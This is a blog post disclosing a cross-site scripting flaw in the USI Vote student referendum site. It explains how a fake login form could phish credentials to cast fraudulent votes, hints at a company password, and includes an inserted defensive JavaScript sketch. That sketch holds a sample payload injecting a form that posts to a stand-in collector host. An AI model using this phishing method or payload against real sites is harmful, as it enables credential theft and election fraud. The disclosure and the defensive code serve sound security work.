USI Vote: a lesson in cross site scripting (xss)


Update: The developer appears to have fixed this issue. He fixed it on the subdomain, but forgot about the root (why am I not surprised). I can still perform xss attacks on http://usivote.com

Very simple proof of concept, check the email address form at – http://t.co/jP0cyXMv

Pro tip: if you’re a company called Starlight, don’t use starlight as your password.

I’ll be posting updates on Twitter – https://twitter.com/#!/ThirdLevelFees

********** Original Post begins************

A chairde,

You may remember me from videos such as “USI Fees Preferendum: is it secure?”

Unfortunately, security concerns about the vulnerability of USI’s voting system were dismissed by the developer and the USI President, in an attempt at damage limitation.

I would like to draw your attention to another security issue (one of several).

Please view this url in Firefox or Chrome – http://bit.ly/usivote (this has now been partially fixed).

What did that url show?

That url contained a FAKE login form (pictured at the beginning of this post), which I added to the USIvote website via a method known as cross site scripting (xss).

Why is this an issue, isn’t Edugate secure?

This can be used as a basic form of phishing:

I take the url with the xss, and shorten it with bit.ly to http://bit.ly/usivote

I then flood social media outlets, like Twitter and Facebook, with that link, encouraging people to vote.

If a victim attempts to enter their login details on the FAKE form, those details get sent to me via the destination.asp in the url.

I can then take the victim’s login details, use them to log in to Edugate, and cast a vote.

This would allow me to cast multiple fraudulent votes, without having any issues with Edugate’s security.

The fact that the form is located at a url on the USI site itself makes it look legitimate in the eyes of the victim.

Please note: This has nothing to do with Edugate, or the HEA’s security – Edugate can only verify the data given to it, it can’t verify the person typing in the info.

Poor coding from the site’s developers allows me to inject my own code into the USIvote website, at will – including html, iframes and javascript.

I can’t stress how poorly USIvote.com has been set up. Multiple security issues like this exist in the parts of the voting system which USI are responsible for.

More info on these & other security holes, and how they can be used to manipulate the result of the Preferendum, will be posted on https://usifeesreferendum.wordpress.com/ tomorrow afternoon.

Regards,
LM

CFAC FTW

*Some versions of IE may contain warnings about xss if you try to view the link. It’s also possible that some anti-virus software, browser extensions, or heightened security defaults from workplace or college pcs may prevent the xss from occurring in your browser.
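The injection described above works when a page echoes request data into its HTML without encoding it. The sketch below is an added example, not code from the post or from the USIvote site: it puts an unencoded template beside an encoded one, with input validation and a Content-Security-Policy as further layers. The `email` parameter, the function names and the sample value are assumptions constructed for illustration.

```javascript
// Added example. Hypothetical page that echoes an "email" query parameter
// back into its form; the names here are assumptions, not the site's code.
const ESC = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the characters that let a value break out of text or a quoted attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ESC[ch]);
}

// Before: the value is concatenated into the markup unchanged.
function renderUnsafe(email) {
  return '<input type="text" name="email" value="' + email + '">';
}

// After: the same template with the value encoded at output time.
function renderSafe(email) {
  return '<input type="text" name="email" value="' + escapeHtml(email) + '">';
}

// Second layer: reject values that cannot be an email address at all.
function isPlausibleEmail(value) {
  return typeof value === 'string' && value.length <= 254 &&
    /^[^\s<>"'@]+@[^\s<>"'@]+\.[^\s<>"'@]+$/.test(value);
}

// Third layer: a policy that keeps scripts and form posts on the site's own
// origin and blocks framed content, should markup ever slip through.
const CSP = "default-src 'self'; form-action 'self'; frame-src 'none'; base-uri 'none'";

// Server-side handling that combines the three layers.
function handleRequest(email) {
  const headers = { 'Content-Type': 'text/html; charset=utf-8', 'Content-Security-Policy': CSP };
  if (!isPlausibleEmail(email)) {
    return { status: 400, headers, body: '<p>Invalid email address.</p>' };
  }
  return { status: 200, headers, body: renderSafe(email) };
}

// Count raw <form> elements a browser would parse out of a response body.
function countForms(html) {
  return (html.match(/<form\b/gi) || []).length;
}

// Constructed sample: closes the attribute and adds a form that posts off-site.
const SAMPLE = '"><form action="https://collector.example/destination.asp"><input name="pw"></form>';

console.log(countForms(renderUnsafe(SAMPLE)), countForms(renderSafe(SAMPLE)), handleRequest(SAMPLE).status);
```

Output encoding is the fix for the root cause; the validation and the policy header only limit the damage if an unencoded echo is missed somewhere else on the site.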


9D  the Vote at USI Special Congress


The video below documents an earlier security issue. If it’s blurry, view it in fullscreen at 720p.
